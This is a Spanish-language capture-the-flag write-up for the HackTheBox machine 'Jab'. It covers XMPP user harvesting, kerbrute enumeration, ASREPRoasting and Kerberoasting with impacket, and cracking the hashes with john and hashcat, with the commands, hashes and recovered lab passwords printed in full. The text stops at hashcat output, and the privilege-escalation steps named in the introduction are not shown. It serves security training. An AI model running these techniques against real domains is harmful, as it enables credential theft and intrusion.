This page looks best with JavaScript enabled

HackTheBox - Jab

 •  ✍️ sckull
featured image

En Jab accedimos a un servido Jabber (XMPP) con Pidgin donde obtuvimos una lista de los usuarios registrados, realizamos ASREPRoast donde crackeamos una de las tres hashes encontradas. Con un par de credenciales validas accedimos a un canal privado donde encontramos credenciales que nos permitieron el acceso por DCOM y luego a la maquina. Finalmente escalamos privilegios utilizamos un plugin en OpenFire que nos permitio ejecutar comandos como administrador en la maquina.

Nombre Jab box_img_maker
OS

Windows

Puntos 30
Dificultad Medium
Fecha de Salida 2024-02-24
IP 10.10.11.4
Maker

mrb3n

Rated 
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [87, 82, 347, 587, 1034, 636, 429, 106, 34, 55],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Recon

nmap

nmap muestra multiples puertos abiertos: http (80) y ssh (22).

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320

# Nmap 7.94SVN scan initiated Mon Mar 18 16:41:34 2024 as: nmap -p53,88,135,139,389,445,464,593,636,3268,3269,5222,5223,5262,5263,5269,5270,5275,5276,5985,7070,7443,7777,9389,47001,49664,49665,49666,49667,49671,49674,49675,49676,49681,49776,58624 -sV -sC -oN nmap_scan 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.060s latency).

PORT      STATE SERVICE             VERSION
53/tcp    open  domain              Simple DNS Plus
88/tcp    open  kerberos-sec        Microsoft Windows Kerberos (server time: 2024-03-18 20:43:54Z)
135/tcp   open  msrpc               Microsoft Windows RPC
139/tcp   open  netbios-ssn         Microsoft Windows netbios-ssn
389/tcp   open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2024-03-18T20:45:11+00:00; +2m10s from scanner time.
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m10s from scanner time.
3268/tcp  open  ldap                Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m10s from scanner time.
3269/tcp  open  ssl/ldap            Microsoft Windows Active Directory LDAP (Domain: jab.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.jab.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:DC01.jab.htb
| Not valid before: 2023-11-01T20:16:18
|_Not valid after:  2024-10-31T20:16:18
|_ssl-date: 2024-03-18T20:45:10+00:00; +2m11s from scanner time.
5222/tcp  open  jabber
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 5v4iv5dqbg
5223/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
|_ssl-date: TLS randomness does not represent time
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5262/tcp  open  jabber
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 8fk9enuneq
5263/tcp  open  ssl/jabber
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
|_ssl-date: TLS randomness does not represent time
5269/tcp  open  xmpp                Wildfire XMPP Client
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
5270/tcp  open  ssl/xmpp            Wildfire XMPP Client
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
|_ssl-date: TLS randomness does not represent time
5275/tcp  open  jabber
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     auth_mechanisms:
|     errors:
|       invalid-namespace
|       (timeout)
|     unknown:
|     capabilities:
|     xmpp:
|       version: 1.0
|_    stream_id: 7m2594nnh2
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5276/tcp  open  ssl/jabber
|_ssl-date: TLS randomness does not represent time
| xmpp-info:
|   STARTTLS Failed
|   info:
|     features:
|     compression_methods:
|     errors:
|       (timeout)
|     unknown:
|     auth_mechanisms:
|     xmpp:
|_    capabilities:
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   RPCCheck:
|_    <stream:error xmlns:stream="http://etherx.jabber.org/streams"><not-well-formed xmlns="urn:ietf:params:xml:ns:xmpp-streams"/></stream:error></stream:stream>
5985/tcp  open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
7070/tcp  open  realserver?
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:43:53 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:43:59 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7443/tcp  open  ssl/oracleas-https?
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.jab.htb
| Subject Alternative Name: DNS:dc01.jab.htb, DNS:*.dc01.jab.htb
| Not valid before: 2023-10-26T22:00:12
|_Not valid after:  2028-10-24T22:00:12
| fingerprint-strings:
|   DNSStatusRequestTCP, DNSVersionBindReqTCP:
|     HTTP/1.1 400 Illegal character CNTL=0x0
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 69
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x0</pre>
|   GetRequest:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:44:06 GMT
|     Last-Modified: Wed, 16 Feb 2022 15:55:02 GMT
|     Content-Type: text/html
|     Accept-Ranges: bytes
|     Content-Length: 223
|     <html>
|     <head><title>Openfire HTTP Binding Service</title></head>
|     <body><font face="Arial, Helvetica"><b>Openfire <a href="http://www.xmpp.org/extensions/xep-0124.html">HTTP Binding</a> Service</b></font></body>
|     </html>
|   HTTPOptions:
|     HTTP/1.1 200 OK
|     Date: Mon, 18 Mar 2024 20:44:14 GMT
|     Allow: GET,HEAD,POST,OPTIONS
|   Help:
|     HTTP/1.1 400 No URI
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 49
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: No URI</pre>
|   RPCCheck:
|     HTTP/1.1 400 Illegal character OTEXT=0x80
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 71
|     Connection: close
|     <h1>Bad Message 400</h1><pre>reason: Illegal character OTEXT=0x80</pre>
|   RTSPRequest:
|     HTTP/1.1 505 Unknown Version
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 58
|     Connection: close
|     <h1>Bad Message 505</h1><pre>reason: Unknown Version</pre>
|   SSLSessionReq:
|     HTTP/1.1 400 Illegal character CNTL=0x16
|     Content-Type: text/html;charset=iso-8859-1
|     Content-Length: 70
|     Connection: close
|_    <h1>Bad Message 400</h1><pre>reason: Illegal character CNTL=0x16</pre>
7777/tcp  open  socks5              (No authentication; connection not allowed by ruleset)
| socks-auth-info:
|_  No authentication
9389/tcp  open  mc-nmf              .NET Message Framing
47001/tcp open  http                Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
49664/tcp open  msrpc               Microsoft Windows RPC
49665/tcp open  msrpc               Microsoft Windows RPC
49666/tcp open  msrpc               Microsoft Windows RPC
49667/tcp open  msrpc               Microsoft Windows RPC
49671/tcp open  msrpc               Microsoft Windows RPC
49674/tcp open  ncacn_http          Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc               Microsoft Windows RPC
49676/tcp open  msrpc               Microsoft Windows RPC
49681/tcp open  msrpc               Microsoft Windows RPC
49776/tcp open  msrpc               Microsoft Windows RPC
58624/tcp open  msrpc               Microsoft Windows RPC
8 services unrecognized despite returning data. If you know the service/version, please submit the following fingerprints at https://nmap.org/cgi-bin/submit.cgi?new-service :
[...]
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-security-mode:
|   3:1:1:
|_    Message signing enabled and required
| smb2-time:
|   date: 2024-03-18T20:45:01
|_  start_date: N/A
|_clock-skew: mean: 2m10s, deviation: 0s, median: 2m09s

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 18 16:43:04 2024 -- 1 IP address (1 host up) scanned in 89.26 seconds

# Nmap 7.94SVN scan initiated Mon Mar 18 16:44:12 2024 as: nmap -sU --min-rate 10000 -oN nmap_scan_udp 10.10.11.4
Nmap scan report for 10.10.11.4
Host is up (0.065s latency).
Not shown: 996 open|filtered udp ports (no-response)
PORT    STATE  SERVICE
3/udp   closed compressnet
53/udp  open   domain
88/udp  open   kerberos-sec
123/udp open   ntp

# Nmap done at Mon Mar 18 16:44:13 2024 -- 1 IP address (1 host up) scanned in 1.04 seconds

SMB & RPC

En samba y RPC no logramos extraer informacion con sesiones nulas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15

 π ~/htb/jab ❯ smbclient -L 10.10.11.4 -N
Anonymous login successful

	Sharename       Type      Comment
	---------       ----      -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.4 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
 π ~/htb/jab ❯ rpcclient -U "" -N 10.10.11.4
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> quit
 π ~/htb/jab ❯

OpenFire

En los puertos 7070, 7443 encontramos un enlace a la documentacion de XMPP aunque el sitio muestra Openfire, segun Wikipedia:

Openfire es un sistema de mensajería instantánea, hecho en java y que utiliza el protocolo XMPP, …

con esto consideramos que esta en ejecucion OpenFire sin embargo el puerto 9090 donde se encuentra el panel de administracion no esta abierto.

image

Jabber (XMPP)

nmap nos muestra multiples puertos donde se muestra informacion sobre Jabber, tras investigar, encontramos que es un protocolo con mensajeria instantanea como funcionalidad. Encontramos tambien Extensiones que permitirian obtener informacion en este protocolo.

Registration

Una de estas extensiones permite el registro de usuarios, el registro en si se debe de considerar una mala configuracion, ya que permitiria el registro a cualquier persona y acceso a funcionalidades y servicios del servidor.

Siguiendo uno de los post para registro de usuarios en XMPP de exploit.im logramos el registro de un usuario utilizando Pidgin.

En Pidgin nos dirigimos a Accounts > Manage > Add, rellenamos los valores necesarios, marcamos la opcion para crear un nuevo usuario.

image

Agregamos la conexion del servidor en opciones avanzadas y seleccionamos la opcion de SSL en caso de existir.

image

Damos a aceptar y nos salta una nueva ventana para finalizar el registro, rellenamos y damos a Ok, con esto completamos el registro.

image
image

Room - Chats

Pidgin permite listar las diferentes salas de chat, listamos estas en la opcin de Join a Chat y Room List, vemos dos: test y test2.
image

En la primera no tenemos acceso o permisos.

image

En la segunda, solo se observa al usuario bdavis enviando lo que parece ser una imagen en base64.

image

Al decodificar la “imagen” vemos unicamente una frase.

1
2
3

 π ~/htb/jab ❯ echo VGhlIGltYWdlIGRhdGEgZ29lcyBoZXJlCg== | base64 -d
The image data goes here
 π ~/htb/jab ❯

Users

Encontramos que es posible enumerar los usuarios, observamos una larga lista con email, usuario, nombre y JID. Sin embargo no se nos permite copiar toda la informacion.

image
image
image

XMPP Console - Plugin

Instalamos los plugins para XMPP, XMPP Service Discovery y Console.

image

Nos dirigimos a Tools > XMPP Console, observamos una nueva ventana, con informacion de la conexion con el servidor.

image

Nuevamente realizamos la busqueda de usuarios y observamos en formato XML la lista de estos.

image

Con esto creamos un nuevo wordlist con los nombres de usuario.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

 π ~/htb/jab ❯ cat users.xml| grep jab.htb | cut -d "@" -f1 | cut -d '>' -f2 | uniq | wc -l
2685
 π ~/htb/jab ❯ cat users.xml| grep jab.htb | cut -d "@" -f1 | cut -d '>' -f2 | uniq > users_uniq.txt
 π ~/htb/jab ❯ head users_uniq.txt
<iq type='result' id='purpleaba15e6a' from='search.jab.htb' to='sckull
lmccarty
nenglert
aslater
rtruelove
pwoodland
pparodi
mhernandez
atorres
apugh
 π ~/htb/jab ❯ nano users_uniq.txt
 π ~/htb/jab ❯ wc -l users_uniq.txt
2684 users_uniq.txt
 π ~/htb/jab ❯

JMontGomery - XMPP

Check Users

Utilizamos kerbrute para verificar que usuarios son validos y cuales no, encontramos 2681 validos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17

 π ~/htb/jab ❯ ./kerbrute userenum -d jab.htb --dc 10.10.11.4 users_uniq.txt -o output_kerbrute.txt

    __             __               __
   / /_____  _____/ /_  _______  __/ /____
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/

Version: v1.0.3 (9dad6e1) - 03/18/24 - Ronnie Flathers @ropnop

2024/03/18 18:03:23 >  Using KDC(s):
2024/03/18 18:03:23 >  	10.10.11.4:88

2024/03/18 18:03:23 >  [+] VALID USERNAME:	 lmccarty@jab.htb
[..snip..]
2024/03/18 18:04:28 >  Done! Tested 2684 usernames (2681 valid) in 17.073 seconds
 π ~/htb/jab ❯

Nuevamente creamos un wordlist esta vez con el output de kerbrute, eliminando lineas en blanco y la ultima linea.

1
2
3
4
5

 π ~/htb/jab ❯ cat output_kerbrute.txt |cut -d ' ' -f8 | cut -d @ -f1 > users_ker.txt
 π ~/htb/jab ❯ nano users_ker.txt
 π ~/htb/jab ❯ wc -l users_ker.txt
2681 users_ker.txt
 π ~/htb/jab ❯

ASREPRoast

Intentamos realizar ASREPRoast con la lista de usuarios que tenemos, observamos tres hashes, nuevamente ejecutamos agregando en formato de hashcat y especificando el archivo.

1
2
3
4
5
6
7
8

 π ~/htb/jab ❯ impacket-GetNPUsers -no-pass -usersfile users_ker.txt jab.htb/ | grep -v UF_DONT_REQUIRE_PREAUTH
Impacket v0.11.0 - Copyright 2023 Fortra

$krb5asrep$23$jmontgomery@JAB.HTB:16a00405a61553a59f87ff6ef1824cbc$33a1c96483c8180056458bdbe966f6d163b047ee40d813a61002593d7978e42dbda18636836a712c80a3948540a2180c2797c80734238c1fa023aa7e3e8ce23d2f468b8e2e6fc37d933747730f826e6fd69136f23cdf84070ec668d2303272aca66c639e41bcb420e4601e6965e4c6c182571c3a0bbfe7991ac89c23a3fc1344b83448770ec87acd4cba4b6ac9f36e6ae1e8a5d14b2b4f4df78f05b6f03cdae569b2461d59e1367be9ec402a8f54a233665a7d0d4d015c6de8dad165a51da14057f95a39034457c4303a4cea3095279650090a654d6dc16e7150273333dfc046258c
$krb5asrep$23$lbradford@JAB.HTB:2eab39ca95d1aa219363a3bc7dc3f8bd$e6790efcab72b924f59bcea691a8798bbbef35df56b668be32e44df2d8aefe568c1b788ff347ee997c76bbc0baf3c7ca383d3421d6af77f4433319fba94bda9caa953d5b5b2a3b03e3bcea2f04f5f7255a4561f04244e5dbec0a8c4c8f37693396663c652aa488fd9d916070323a79d6dff89a874d03ea2c91bf2b89bf1326d3da33db37d2ee9b62dbe483a857d6ce6486e52c332ae86e117d5d671455dec05ec0cdde1d32bef63afc2749bccf76b75affa568b8d5ae970562758284f2627a6743b5b7f9e450b6167cb9f3ff3e76083f165b2a669b22a38a0883276f02a126a9409b
$krb5asrep$23$mlowe@JAB.HTB:711ebac5068383cb260b0f4a2def7d54$badbe73c29cccbf86b0bf5d3485d58022ea0df1409b0ebe25d993cf66fce0507682c2b74eb7ca1383ff3d206b540b79c84b79db62ab740571382d6306ed05bae4378cb294ce23f0aa2f70b3629e3ff32378cedb2c1d43718abc80ad8bfca1f1d69e09f0974a7a87892e46f076e8b5385cbeec49be1915d582de1f204b8e646ec52807e999e18c00daafba2e81efc27f029405e2a250bb8292f5323c6b319f52af3bdff0324179c10f032679a90ec9b791f8382feb49f5e0ec53c8154a1e830dbe02b57981ecf8fab3f35497e99ddccabae49796f04e1927d72b68eb3dd109376f326
 π ~/htb/jab ❯
#  impacket-GetNPUsers -no-pass -usersfile users_uniq.txt -format hashcat -outputfile hashes.asreproast jab.htb/ | grep -v "UF_DONT_REQUIRE_PREAUTH"

Cracking the Hash

Ejecutamos john con el wordlist rockyou.txt sobre el archivo de hash, vemos la contrasena para jmontgomery.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

 π ~/htb/jab ❯ john hashes.asreproast -wordlist=$ROCK
Using default input encoding: UTF-8
Loaded 3 password hashes with 3 different salts (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Midnight_121     ($krb5asrep$23$jmontgomery@JAB.HTB)
1g 0:00:01:15 DONE (2024-03-18 18:44) 0.01329g/s 190639p/s 525148c/s 525148C/s  0841079575..*7¡Vamos!
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
 π ~/htb/jab ❯

Observamos que este usuario tiene acceso por smb, sin embargo no se muestra algun recurso fuera de lo “comun”.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

 π ~/htb/jab ❯ crackmapexec smb 10.10.11.4 -u jmontgomery -p 'Midnight_121' --shares
SMB         10.10.11.4      445    DC01             [*] Windows 10.0 Build 17763 x64 (name:DC01) (domain:jab.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.4      445    DC01             [+] jab.htb\jmontgomery:Midnight_121
SMB         10.10.11.4      445    DC01             [+] Enumerated shares
SMB         10.10.11.4      445    DC01             Share           Permissions     Remark
SMB         10.10.11.4      445    DC01             -----           -----------     ------
SMB         10.10.11.4      445    DC01             ADMIN$                          Remote Admin
SMB         10.10.11.4      445    DC01             C$                              Default share
SMB         10.10.11.4      445    DC01             IPC$            READ            Remote IPC
SMB         10.10.11.4      445    DC01             NETLOGON        READ            Logon server share
SMB         10.10.11.4      445    DC01             SYSVOL          READ            Logon server share
 π ~/htb/jab ❯

Agregamos este jmontgomery a Pidgin donde logramos realizar una conexion, tras ello listamos la lista de salas de chat, encontramos una nueva, pentest2003.

image

Vemos una conversacion donde se muestra el uso de GetUsersSPNS, y que, se descubrio el usuario svc_openfire que ademas se le realizo el crackeo del hash y se muestra el resultado.

image

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48

*** 2023-11-21
[13:31:13] <adunn> team, we need to finalize post-remediation testing from last quarter's pentest. @bdavis Brian can you please provide us with a status? 
[13:33:58] <bdavis> sure. we removed the SPN from the svc_openfire account. I believe this was finding #2. can someone from the security team test this? if not we can send it back to the pentesters to validate. 
[14:30:41] <bdavis> here are the commands from the report, can you find someone from the security team who can re-run these to validate? 
[14:30:43] <bdavis> $ GetUserSPNs.py -request -dc-ip 192.168.195.129 jab.htb/hthompson

Impacket v0.9.25.dev1+20221216.150032.204c5b6b - Copyright 2021 SecureAuth Corporation

Password:
ServicePrincipalName  Name          MemberOf  PasswordLastSet             LastLogon  Delegation 
--------------------  ------------  --------  --------------------------  ---------  ----------
http/xmpp.jab.local   svc_openfire            2023-10-27 15:23:49.811611  <never>               



[-] CCache file is not found. Skipping...
$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$b1abbb2f4beb2a48e7412ccd26b60e61$864f27ddaaded607ab5efa59544870cece4b6262e20f3bee38408d296ffbf07ceb421188b9b82ac0037ae67b488bb0ef2178a0792d62<SNIP>

[14:30:56] <bdavis> $ hashcat -m 13100 svc_openfire_tgs /usr/share/wordlists/rockyou.txt 

hashcat (v6.1.1) starting...

<SNIP>

$krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openfire*$de17a01e2449626571bd9416dd4e3d46$4fea18693e1cb97f3e096288a76204437f115fe49b9611e339154e0effb1d0fcccfbbbb219da829b0ac70e8420f2f35a4f315c5c6f1d4ad3092e14ccd506e9a3bd3d20854ec73e62859cd68a7e6169f3c0b5ab82064b04df4ff7583ef18bbd42ac529a5747102c2924d1a76703a30908f5ad41423b2fff5e6c03d3df6c0635a41bea1aca3e15986639c758eef30b74498a184380411e207e5f3afef185eaf605f543c436cd155823b7a7870a3d5acd0b785f999facd8b7ffdafe6e0410af26efc42417d402f2819d03b3730203b59c21b0434e2e0e7a97ed09e3901f523ba52fe9d3ee7f4203de9e857761fbcb417d047765a5a01e71aff732e5d5d114f0b58a8a0df4ca7e1ff5a88c532f5cf33f2e01986ac44a353c0142b0360e1b839bb6889a54fbd9c549da23fb05193a4bfba179336e7dd69380bc4f9c3c00324e42043ee54b3017a913f84a20894e145b23b440aff9c524efb7957dee89b1e7b735db292ca5cb32cf024e9b8f5546c33caa36f5370db61a9a3facb473e741c61ec7dbee7420c188e31b0d920f06b7ffc1cb86ace5db0f9eeaf8c13bcca743b6bf8b2ece99dd58aff354f5b4a78ffcd9ad69ad8e7812a2952806feb9b411fe53774f92f9e8889380dddcb59de09320094b751a0c938ecc762cbd5d57d4e0c3d660e88545cc96e324a6fef226bc62e2bb31897670929571cd728b43647c03e44867b148428c9dc917f1dc4a0331517b65aa52221fcfe9499017ab4e6216ced3db5837d10ad0d15e07679b56c6a68a97c1e851238cef84a78754ff5c08d31895f0066b727449575a1187b19ad8604d583ae07694238bae2d4839fb20830f77fffb39f9d6a38c1c0d524130a6307125509422498f6c64adc030bfcf616c4c0d3e0fa76dcde0dfc5c94a4cb07ccf4cac941755cfdd1ed94e37d90bd1b612fee2ced175aa0e01f2919e31614f72c1ff7316be4ee71e80e0626b787c9f017504fa717b03c94f38fe9d682542d3d7edaff777a8b2d3163bc83c5143dc680c7819f405ec207b7bec51dabcec4896e110eb4ed0273dd26c82fc54bb2b5a1294cb7f3b654a13b4530bc186ff7fe3ab5a802c7c91e664144f92f438aecf9f814f73ed556dac403daaefcc7081957177d16c1087f058323f7aa3dfecfa024cc842aa3c8ef82213ad4acb89b88fc7d1f68338e8127644cfe101bf93b18ec0da457c9136e3d0efa0d094994e1591ecc4:!@#$%^&*(1qazxsw
                                                
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*svc_openfire$JAB.HTB$jab.htb/svc_openf...91ecc4
Time.Started.....: Fri Oct 27 15:30:12 2023 (17 secs)
Time.Estimated...: Fri Oct 27 15:30:29 2023 (0 secs)
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   873.9 kH/s (10.16ms) @ Accel:64 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
